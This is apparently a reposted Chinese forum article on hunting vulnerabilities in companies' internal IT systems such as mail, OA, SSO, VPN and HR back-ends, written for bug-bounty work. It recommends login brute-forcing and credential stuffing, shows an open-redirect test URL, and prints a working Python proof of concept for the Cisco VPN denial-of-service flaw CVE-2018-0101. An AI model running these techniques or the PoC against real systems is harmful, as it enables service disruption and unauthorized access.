谈谈企业内部IT系统漏洞的挖掘
前言
在企业内部,为了方便员工无纸化办公及审批流程上的电子化需求,都建设了不少的IT业务系统,这些内部业务系统因为只有公司内部员工才能使用,所以可以从这些地方下手进行漏洞的挖掘。
在挖掘之前首先我们要搞清楚在企业的内网中,建设的业务系统有哪些,是自己建立的还是采用第三方厂商的系统,如果是自己建立的系统,则挖掘漏洞的难度较大;而如果使用第三方公司的业务系统,就会相对来说好操作一点,根据我挖掘漏洞的经验,大概总结出这些:
一般使用 Microsoft Exchange、Zimbra、Coremail,或者使用网易、腾讯、谷歌等公司的企业邮箱,但根据我的观察,以Exchange居多。
如果没有二次验证可以尝试进行爆破登录,但是如果有二次验证就不行了
这里可选择的产品太多了,要根据实际环境来看,存在的漏洞点例如:
致远OA的RCE代码执行:
这些系统主要以Web业务为主,比如HR系统、权限系统、各个业务管理后台、CRM等,主要存在的漏洞就是未授权访问,XSS盲打等漏洞
但是因为一般来说这些页面都是接入了权限系统的,因为很多业务系统都是如果没有登录态或者登录态消失的话,你一打开就会把你跳转到统一登录页可以使用Burp Suite拦截,
你可以直接通过查看源代码的方式发现页面中的JS文件寻找接口,如果JS中有Source Map,就看Source Map,否则你就只能看Chrome DevTool里面那上万行即使Lint一下也看不懂的代码了:
例如,某处API越权:
未授权访问:
Apereo CAS的Logout任意URL跳转漏洞,这个要看企业有没有做验证,如果没有做验证的话可以尝试
例如 https://example.com/sso/logout?service=https://www.baidu.com
登出时的服务域名设置为百度进行尝试看是否可以跳转
这个我觉得没有企业会自己搞吧,使用的无非就这么几家:思科、深信服、Palo Alto或者华为什么
一般可以用来撞库爆破,因为这类VPN系统通常不会存在验证码(有些厂家魔改的除外),而且一般会和统一身份认证SSO对接,例如:
通过VPN成功撕入某厂商内网:
又或者拒绝服务漏洞,比如:Cisco VPN的拒绝服务漏洞CVE-2018-0101。对应PoC:
import requestsimport sysimport urllib3headers = {}headers['User-Agent'] = 'Open AnyConnect VPN Agent v7.08-265-gae481214-dirty'headers['Content-Type'] = 'application/x-www-form-urlencoded'headers['X-Aggregate-Auth'] = '1'headers['X-Transcend-Version'] = '1'headers['Accept-Encoding'] = 'identity'headers['Accept'] = '*/*'headers['X-AnyConnect-Platform'] = 'linux-64'headers['X-Support-HTTP-Auth'] = 'false'xml = """<?xml version="1.0" encoding="UTF-8"?><config-auth client="a" type="a" aggregate-auth-version="a"> <host-scan-reply>A</host-scan-reply></config-auth>"""r = requests.post(sys.argv[1], data = xml, headers = headers, verify=False, allow_redirects=False)
大部分都是钉钉,或者有的企业自己开发了IM比如阿里郎、橘子堆等,可以尝试进行挖掘,但是最好不要去社工,很多SRC都是禁止你去社工的。
转自先知社区
打赏我,让我更有动力~
0 条回复
|
直到 2019-7-23 |
996 次浏览
登录后才可发表内容
返回:技术文章投稿区
漏洞文章
